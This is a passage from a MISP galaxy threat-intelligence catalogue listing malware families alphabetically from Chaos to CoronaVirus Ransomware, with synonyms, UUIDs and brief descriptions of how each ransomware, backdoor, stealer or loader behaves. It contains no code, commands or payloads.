`RyukJoke`
`Yashma`

Internal MISP references

UUID fb760029-9331-4ba0-b644-d47a8e6d3ad2 which can be used as unique global reference for Chaos (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chaperone

According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents and cryptography key stealers, and even its own file indexer for the victim’s machine. We discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chaperone.

Known Synonyms
`Taj Mahal`

Internal MISP references

UUID e4027aaa-de86-48ea-8567-c215cdb88ec1 which can be used as unique global reference for Chaperone in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ChargeWeapon

Internal MISP references

UUID 4eccbebb-9f7d-411f-a8fe-da01c99c8e3b which can be used as unique global reference for ChargeWeapon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CHCH

CHCH is a Ransomware spotted in the wild in December 2019. It encrypts victim files and adds the extension .chch to them while it drops a ransomware note named: READ_ME.TXT

Internal MISP references

UUID 22b03600-505c-41d4-ba1c-45d70cc2e123 which can be used as unique global reference for CHCH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ChChes

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ChChes.

Known Synonyms
`HAYMAKER`
`Ham Backdoor`

Internal MISP references

UUID 6eee9bf9-ffce-4c88-a5ad-9d80f6fc727c which can be used as unique global reference for ChChes in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CHEESETRAY

CHEESETRAY is a sophisticated proxy-aware backdoor that can operate in both active and passive mode depending on the passed command-line parameters. The backdoor is capable of enumerating files and processes, enumerating drivers, enumerating remote desktop sessions, uploading and downloading files, creating and terminating processes, deleting files, creating a reverse shell, acting as a proxy server, and hijacking processes among its other functionality. The backdoor communicates with its C&C server using a custom binary protocol over TCP with port specified as a command-line parameter.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CHEESETRAY.

Known Synonyms
`CROWDEDFLOUNDER`

Internal MISP references

UUID 7a6c1063-32b9-4007-8283-ccd4a2163caa which can be used as unique global reference for CHEESETRAY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chernolocker

Chernolocker is a ransomware that encrypts a victim's files by using AES-256 and it asks for BTC ransom. Different versions are classified by the attacker's email address which changes over time.

Internal MISP references

UUID e21dc86d-c8a5-44f7-b9d6-5e60373e838b which can be used as unique global reference for Chernolocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CherryLoader

Internal MISP references

UUID c79c6ad0-3ee9-4fca-be20-084e012ff002 which can be used as unique global reference for CherryLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CherryPicker POS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CherryPicker POS.

Known Synonyms
`cherry_picker`
`cherrypicker`
`cherrypickerpos`

Internal MISP references

UUID e6ab90d3-8011-4927-a0cd-eab57e7971aa which can be used as unique global reference for CherryPicker POS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ChewBacca

Internal MISP references

UUID 2137a0ce-8d06-4538-ad0b-6ab6ec865493 which can be used as unique global reference for ChewBacca in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chimera

According to PCrisk, Chimera is a ransomware virus that encrypts files stored on infected systems. It is distributed using various false job applications, business offers, and infected email attachments. After encrypting the files, Chimera adds a . crypt extension to each file.

Internal MISP references

UUID 830b0526-8e3b-4369-9677-9f8a31ca5ded which can be used as unique global reference for Chimera in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CHINACHOPPER

a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

Internal MISP references

UUID 0d8f0bb7-e14f-4b85-baa1-6ec951aa6c53 which can be used as unique global reference for CHINACHOPPER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chinad

Adware that shows advertisements using plugin techniques for popular browsers

Internal MISP references

UUID 098cfb93-8921-48f0-a694-a83f350e8a61 which can be used as unique global reference for Chinad in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ChinaJm

Ransomware.

Internal MISP references

UUID ef216f1d-9ee5-4676-ae34-f954a8611290 which can be used as unique global reference for ChinaJm in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chinotto (Windows)

Internal MISP references

UUID fda4561c-56a9-479b-8db5-7f6774be9a3d which can be used as unique global reference for Chinotto (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chinoxy

Internal MISP references

UUID f8f5f33b-c719-4b6d-bf98-07979ac0cd97 which can be used as unique global reference for Chinoxy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chir

Internal MISP references

UUID 59b5697a-5154-4c08-87f8-c71b0e8425fc which can be used as unique global reference for Chir in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.chir - webarchive

Associated metadata

Metadata key	Value
type	[]

Chisel (Windows)

Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. It was for example observed by SentinelOne during a PYSA ransomware campaign to achieve persistence and used as backdoor. Github: https://github.com/jpillora/chisel

Internal MISP references

UUID fbfbbcbc-6730-4c4d-9ece-9b72802d42e9 which can be used as unique global reference for Chisel (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ChiserClient

Internal MISP references

UUID 637714e1-c46d-4c10-bbc5-604c6e47fbbb which can be used as unique global reference for ChiserClient in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Choziosi (Windows)

Choziosi is a browser hijacker for Chrome. It was first seen in January 2022. It commonly infects users via pirated media downloads like games, software, wallpapers or movies. The initial infectors are available for several platforms such as Mac and Windows.

Its main component is the Chrome browser extension written in JavaScript with the purpose of serving advertisments and hijacking search requests to Google, Yahoo and Bing.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Choziosi (Windows).

Known Synonyms
`ChromeLoader`

Internal MISP references

UUID 7cfa3158-ccfc-4c23-8e7a-5d4e9cc1c43f which can be used as unique global reference for Choziosi (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ChrGetPdsi Stealer

ChrGetPdsi is a basic infostealer written in Golang which is designed to steal browser history and logins, and targets Chrome, Edge, and Firefox. The output is written to a text file named chrgetpdsi.txt. Based on the samples analysed, the malware does not appear to have networking capabilities, and therefore it is likely that it is intended to be used in a post-compromise situation where the attacker already has access to the target system and can retrieve the created output file via other means.ChrGetPdsi has been observed being deployed by the Broomstick malware.

Internal MISP references

UUID 3cc84a6b-4706-4ada-9355-7c945bb0eb4f which can be used as unique global reference for ChrGetPdsi Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Chthonic

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chthonic.

Known Synonyms
`AndroKINS`

Internal MISP references

UUID 9441a589-e23d-402d-9603-5e55e3e33971 which can be used as unique global reference for Chthonic in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

cifty

Internal MISP references

UUID 8a1af36b-b8e1-4e05-ac42-c2866ffba031 which can be used as unique global reference for cifty in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cinobi

Internal MISP references

UUID d0f0f754-fe9b-45bd-a9d2-c6110c807af4 which can be used as unique global reference for Cinobi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cinoshi

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cinoshi.

Known Synonyms
`Agniane`

Internal MISP references

UUID 65f75ea8-c06b-4d8d-b757-e992966667b5 which can be used as unique global reference for Cinoshi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Citadel

Internal MISP references

UUID 7f550cae-98b7-4a0c-bed2-d79227dc6310 which can be used as unique global reference for Citadel in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Clambling

Clambling was discovered by Trend Micro and TalentJump. It is a custom malware used by an actor they refer to as DRBControl, which targets gambling and betting companies in Southeast Asia. One version of Clambling uses Dropbox as C&C channel to hide its communication.

Internal MISP references

UUID 783c8192-d00d-446c-bf06-0ce0cb4bc2c2 which can be used as unique global reference for Clambling in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CLASSFON

Internal MISP references

UUID c433e0f1-760c-41e6-bb62-13eaf7bbf1f4 which can be used as unique global reference for CLASSFON in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CLEANTOAD

CLEANTOAD is a disruption tool that will delete file system artifacts, including those related to BLINDTOAD, and will run after a date obtained from a configuration file. The malware injects shellcode into notepad.exe and it overwrites and deletes files, modifies registry keys, deletes services, and clears Windows event logs.

Internal MISP references

UUID c0417767-5b98-43b0-b9e7-e43dc7f53c6a which can be used as unique global reference for CLEANTOAD in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Client Maximus

Internal MISP references

UUID c2bd0771-55d6-4242-986d-4bfd735998ba which can be used as unique global reference for Client Maximus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ClipBanker

The ClipBanker Trojan is known as an information stealer and spy trojan, it aims to steal and record any type of sensitive information from the infected environment such as browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential information. The ClipBanker uses PowerShell commands for executing malicious activities. The thing that made the ClipBanker unique is its ability to record various banking actions of the user and manipulate them for its own benefit. The distribution method of the ClipBanker is through phishing emails or through social media posts that lure users to download malicious content.

Internal MISP references

UUID 5d6a9b59-96b1-4bc4-824d-ffe208b99462 which can be used as unique global reference for ClipBanker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Clipog

A keylogger.

Internal MISP references

UUID 0cc6c7a8-9484-4017-97ac-2fd5594f27f8 which can be used as unique global reference for Clipog in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Clop (Windows)

Clop is a ransomware which uses the .clop extension after having encrypted the victim's files. Another unique characteristic belonging with Clop is in the string: "Dont Worry C|0P" included into the ransom notes. It is a variant of CryptoMix ransomware, but it additionally attempts to disable Windows Defender and to remove the Microsoft Security Essentials in order to avoid user space detection.

Internal MISP references

UUID 8071f2d8-cc44-4682-845b-6f39a9f8b587 which can be used as unique global reference for Clop (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CLOUDBURST

CLOUDBURST aka NickelLoader is an HTTP(S) downloader.

It recognizes a set of four basic commands, all five letters long, like abcde, avdrq, gabnc and dcrqv (alternatively: eknag, eacec, hjmwk, wohnp). The most important functionality is to load a received buffer, either as a DLL via the MemoryModule implementation, or as a shellcode.

It uses AES for encryption and decryption of network traffic. It usually sends the following information back to its C&C server: computer name, product name and the list of running processes. Typically, it uses two hardcoded parameter names for its initial HTTP POST requests: gametype and type (alternatively: type and code).

The CLOUDBURST payload is disguised as mscoree.dll and is side-loaded via a legitimate Windows binary PresentationHost.exe with the argument -embeddingObject. It comes either as a trojanized plugin project for Notepad++ (usually FingerText by erinata), or as a standalone DLL loaded by a dropper, which is a trojanized plugin project as well (usually NppyPlugin by Jari Pennanen).

The CLOUDBURST malware was used in Operation DreamJob attacks against an aerospace company and a network running Microsoft Intune software in Q2-Q3 2022.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CLOUDBURST.

Known Synonyms
`NickelLoader`

Internal MISP references

UUID 3f320960-77a2-4525-8d19-95b6028ec0d5 which can be used as unique global reference for CLOUDBURST in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CloudEyE

CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CloudEyE.

Known Synonyms
`GuLoader`
`vbdropper`

Internal MISP references

UUID 966f54ae-1781-4f2e-8b32-57a242a00bb9 which can be used as unique global reference for CloudEyE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CloudWizard

Internal MISP references

UUID 4d941367-b22e-4d01-930e-c757b58eff58 which can be used as unique global reference for CloudWizard in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CloudDuke

F-Secure describes CloudDuke as a malware toolset known to consist of, at least, a downloader, a loader and two backdoor variants. The CloudDuke downloader will download and execute additional malware from a preconfigured location. Interestingly, that location may be either a web address or a Microsoft OneDrive account. Both CloudDuke backdoor variants support simple backdoor functionality, similar to SeaDuke. While one variant will use a preconfigured C&C server over HTTP or HTTPS, the other variant will use a Microsoft OneDrive account to exchange commands and stolen data with its operators.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CloudDuke.

Known Synonyms
`CloudLook`
`MiniDionis`

Internal MISP references

UUID 40baac36-2fd0-49b3-b05b-1087d60f4f2c which can be used as unique global reference for CloudDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CloudScout

According to ESET Research, CloudScout is a toolset is capable of retrieving data from various cloud services by leveraging stolen web session cookies. Through a plugin, CloudScout works seamlessly with MgBot, Evasive Panda’s signature malware framework.

Internal MISP references

UUID 76abb504-a218-444f-a5ce-8921e10c4a4e which can be used as unique global reference for CloudScout in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

cmoon

Internal MISP references

UUID 0f5a7988-bf8c-4bdc-a4db-782bba424999 which can be used as unique global reference for cmoon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CMSBrute

Internal MISP references

UUID ad960c5c-f2a1-405e-a32a-31f75b7c6859 which can be used as unique global reference for CMSBrute in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CMSTAR

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CMSTAR.

Known Synonyms
`meciv`

Internal MISP references

UUID e4e15ab4-9ba6-444a-b154-2854757e792e which can be used as unique global reference for CMSTAR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CoalaBot

Internal MISP references

UUID 7acd9a27-f550-4c47-9fc8-429b61b04217 which can be used as unique global reference for CoalaBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CobaltMirage FRP

This Go written malware was observed during campaign of COBALT MIRAGE; it includes FRP (Fast Reverse Proxy) published by fatedier on GitHub (https://github.com/fatedier/frp) and other projects additionally.

Internal MISP references

UUID a9bebdbf-24b3-40e0-9596-2adf60c3abf8 which can be used as unique global reference for CobaltMirage FRP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cobalt Strike

Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.

The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cobalt Strike.

Known Synonyms
`Agentemis`
`BEACON`
`CobaltStrike`
`cobeacon`

Internal MISP references

UUID 1a1d3ea4-972e-4c48-8d85-08d9db8f1550 which can be used as unique global reference for Cobalt Strike in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cobian RAT

Internal MISP references

UUID aa553bbd-f6e4-4774-9ec5-4607aa2004b8 which can be used as unique global reference for Cobian RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CobInt

CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager. It's CRM mailslot module was also observed being downloaded by ISFB.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CobInt.

Known Synonyms
`COOLPANTS`

Internal MISP references

UUID 23160942-6de6-41c0-8d8c-44876191c3f0 which can be used as unique global reference for CobInt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cobra Carbon System

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cobra Carbon System.

Known Synonyms
`Carbon`

Internal MISP references

UUID f75452f3-6a4a-4cd6-b3e0-089fa320e9b9 which can be used as unique global reference for Cobra Carbon System in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CockBlocker

Internal MISP references

UUID 77e85a95-6a78-4255-915a-488eb73ee82f which can be used as unique global reference for CockBlocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CodeKey

Internal MISP references

UUID cb5bad79-707c-493d-8a2b-4c0be38301c5 which can be used as unique global reference for CodeKey in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CodeCore

Ransomware.

Internal MISP references

UUID 3952f4e0-0621-4bc3-bc6f-a848e0e49bd1 which can be used as unique global reference for CodeCore in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cohhoc

Internal MISP references

UUID 9481d7b1-307c-4504-9333-21720b85317b which can be used as unique global reference for Cohhoc in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Coinminer

Coinminer is an unwanted malicious software which uses the victim's computational power (CPU and RAM mostly) to mine for coins (for example Monero or Zcash). The malware achieves persistence by adding one of the opensource miners on startup without the victim's consensus. Most sophisticated coin miners use timer settings or cap the CPU usage in order to remain stealthy.

Internal MISP references

UUID 333e2e87-b9b0-4e2e-9ed9-7259c55a93db which can be used as unique global reference for Coinminer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

coldbrew

Internal MISP references

UUID b30a19b2-383b-4ca5-a047-00910b8a3e03 which can be used as unique global reference for coldbrew in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ColdLock

Internal MISP references

UUID 140f271b-0be1-4455-96c6-015632ade33a which can be used as unique global reference for ColdLock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cold$eal

Cold$eal is a packer for encrypting (sealing) malware. It contains some AV-evasion techniques as well as some sandbox-detection. It was developed by $@dok (aka Sadok aka Coldseal). It was available as a cryptor service under the url coldseal.us and was later sold as a toolkit consisting of the cryptor and a custom made cryptostub including a FuD garantee backed by free update to the cryptostub. The payload was encrypted using RC4 and added to the cryptostub as a resource. The encryption key itself was stored inside the resource as well. Upon start the cryptostub would extract the key, decrypt the payload and perform a selfinjection using the now decrypted payload. Note: The packed sample provided contains some harmless payload, while the unpacked sample is the bare cryptostub without a payload.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cold$eal.

Known Synonyms
`ColdSeal`

Internal MISP references

UUID 8d5b7766-673c-493f-b760-65afd61689cb which can be used as unique global reference for Cold$eal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ColdStealer

ColdStealer is a relatively new malicious program that was discovered in 2022. Like many other stealers its main purpose is to steal credentials and information from web browsers, in addition to stealing cryptocurrency wallets, FTP credentials, various files and information about the system such as OS version, system language, processor type and clipboard data. When the infostealer collects information that will be stolen, it saves the information in the ZIP form instead of files in the memory. Doing so will allow the malware to bypass detection as there are no traces of files and execution. The only known method of delivering stolen information to cybercriminals is by sending a ZIP archive to the hardcoded command and control (C2) server.

Internal MISP references

UUID 5869f846-adf8-4798-833e-54c05f9b30f6 which can be used as unique global reference for ColdStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Colibri Loader

According to cloudsek, Colibri Loader is a form of malware designed to facilitate the installation of additional malware types on an already compromised system. This loader employs various techniques to evade detection, such as excluding the Import Address Table (IAT) and utilizing encrypted strings to complicate analysis. Similar to other loader malware, Colibri can be utilized to deploy information-stealing malware, potentially leading to significant loss of sensitive data. As a result, users should exercise caution when encountering unfamiliar files on their systems.

Internal MISP references

UUID 09926538-a7a0-413b-bc7d-4b20a8f4b515 which can be used as unique global reference for Colibri Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Collection RAT

Internal MISP references

UUID 6c6570f3-b407-458f-bb83-647c0b1f5dd9 which can be used as unique global reference for Collection RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CollectorGoomba

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CollectorGoomba.

Known Synonyms
`Collector Stealer`

Internal MISP references

UUID 5c0f96fd-54c0-44cd-9caf-b986e3fa2879 which can be used as unique global reference for CollectorGoomba in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Colony

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Colony.

Known Synonyms
`Bandios`
`GrayBird`

Internal MISP references

UUID 4db94d24-209a-4edd-b175-3a3085739b94 which can be used as unique global reference for Colony in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Combojack

Internal MISP references

UUID 150cde2c-ae36-4fa5-8d8d-8dedc3de43de which can be used as unique global reference for Combojack in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Combos

Internal MISP references

UUID 2b71a966-da08-4467-a785-cb6abf2fa65e which can be used as unique global reference for Combos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ComeBacker

ComeBacker was found in a backdoored Visual Studio project that was used to target security researchers in Q4 2020 and early 2021.

It is an HTTP(S) downloader.

It uses the AES CBC cipher implemented through the OpenSSL's EVP interface for decryption of its configuration, and also for encryption and decryption of the client-server communication.

The parameter names in HTTP POST requests of the client are generated randomly. As the initial connection, the client exchanges the keys with the server via the Diffie–Hellman key agreement protocol for the elliptic curve secp521r1. The client generates a random 32-bytes long private key, and the server responds with its public key in a buffer starting with the wide character "0".

Next, the clients sends the current local time, and the server responds with a buffer containing multiple values separated with the pipe symbol. The typical values are the encrypted payload, the export to execute, and the MD5 hash of the decrypted DLL to verify the authenticity of the payload.

There are variants of ComeBacker without statically linked OpenSSL. In that case, the key exchange is omitted and AES CBC is replaced with HC-256.

Internal MISP references

UUID 44240b4b-09d3-4b6b-a077-bce00c35ea38 which can be used as unique global reference for ComeBacker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Comfoo

Internal MISP references

UUID f5044eda-3119-4fcf-b8af-9b56ab66b9be which can be used as unique global reference for Comfoo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ComLook

ComLook is a malicious plugin for the mail client "The Bat!", written in C++ and compiled with MSVC 10.0. It implements malicious commands like PutFile, GetFile, SetConfig, GetConfig, and Command. It contains hard-coded email addresses and other information, indicating a target in Azerbaijan. It was first uploaded to VirusTotal on January 12, 2022, and is associated with the APT group Turla. It appears to be a targeted deployment.

Internal MISP references

UUID 7726de54-95cc-4783-b26f-79882f0f6cba which can be used as unique global reference for ComLook in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CommonMagic

Internal MISP references

UUID 600b553b-660b-4bbd-9c5d-4e91af9d276a which can be used as unique global reference for CommonMagic in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ComodoSec

Internal MISP references

UUID bdecbbe9-7646-40cd-a9f3-86a20b13e6da which can be used as unique global reference for ComodoSec in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

COMpfun

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular COMpfun.

Known Synonyms
`Reductor RAT`

Internal MISP references

UUID 541d5642-0648-4b5a-97b9-81110f273771 which can be used as unique global reference for COMpfun in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Computrace

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Computrace.

Known Synonyms
`lojack`

Internal MISP references

UUID d24882f9-8645-4f6a-8a86-2f85daaad685 which can be used as unique global reference for Computrace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ComradeCircle

Internal MISP references

UUID 634f1977-6cba-4ad7-9501-09e1eaefde56 which can be used as unique global reference for ComradeCircle in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

concealment_troy

Internal MISP references

UUID db370ffc-c3d2-42fc-b45b-f777d69f98c5 which can be used as unique global reference for concealment_troy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Conficker

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Conficker.

Known Synonyms
`Kido`
`downadup`
`traffic converter`

Internal MISP references

UUID 5f638985-49e1-4059-b2eb-f2ffa397b212 which can be used as unique global reference for Conficker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Confucius

Internal MISP references

UUID fe43c7e6-1d62-4421-9d85-519f53e8073f which can be used as unique global reference for Confucius in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Conti (Windows)

Conti is an extremely damaging ransomware due to the speed with which it encrypts data and spreads to other systems. It was first observed in 2020 and it is thought to be led by a Russia-based cybercrime group that goes under the Wizard Spider pseudonym. In early May 2022, the US government announced a reward of up to $10 million for information on the Conti ransomware gang.

Internal MISP references

UUID c9dca6f3-2a84-4abe-8f33-ccb7a7a0246c which can be used as unique global reference for Conti (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Contopee

FireEye described this malware as a proxy-aware backdoor that communicates using a custom-encrypted binary protocol. It may use the registry to store optional configuration data. The backdoor has been observed to support 26 commands that include directory traversal, file system manipulation, data archival and transmission, and command execution.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Contopee.

Known Synonyms
`WHITEOUT`

Internal MISP references

UUID 4181ebb5-cce9-4fb1-81a1-c3f34cb643de which can be used as unique global reference for Contopee in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CookieBag

Internal MISP references

UUID 9afa9b7e-e2c1-4725-8d8d-cec7933cc63b which can be used as unique global reference for CookieBag in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CopperStealer

According to PCRIsk, CopperStealer, also known as Mingloa, is a malicious program designed to steal sensitive/personal information. It also has the capability to cause chain infections (i.e., download/install additional malware).

Significant activity of CopperStealer has been observed in Brazil, India, Indonesia, Pakistan, and the Philippines. At the time of research, this malware had been noted being spread via websites offering illegal activation tools ("cracks") for licensed software products.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CopperStealer.

Known Synonyms
`Mingloa`

Internal MISP references

UUID 87afcc5d-27f6-4427-b43c-4621a66e5041 which can be used as unique global reference for CopperStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Corebot

Internal MISP references

UUID 495377c4-1be5-4c65-ba66-94c221061415 which can be used as unique global reference for Corebot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CoreDN

Internal MISP references

UUID 331f0c80-a795-48aa-902e-0b0d57de85f5 which can be used as unique global reference for CoreDN in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Coreshell

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Coreshell.

Known Synonyms
`SOURFACE`

Internal MISP references

UUID 579cc23d-4ba4-419f-bf8a-f235ed33125e which can be used as unique global reference for Coreshell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CoronaVirus Ransomware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CoronaVirus Ransomware.

Known Synonyms
`CoronaVirus Cover-Ransomware`

Internal MISP references

UUID ba683942-1524-459a-ad46-827464967164 which can be used as unique global reference for CoronaVirus Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

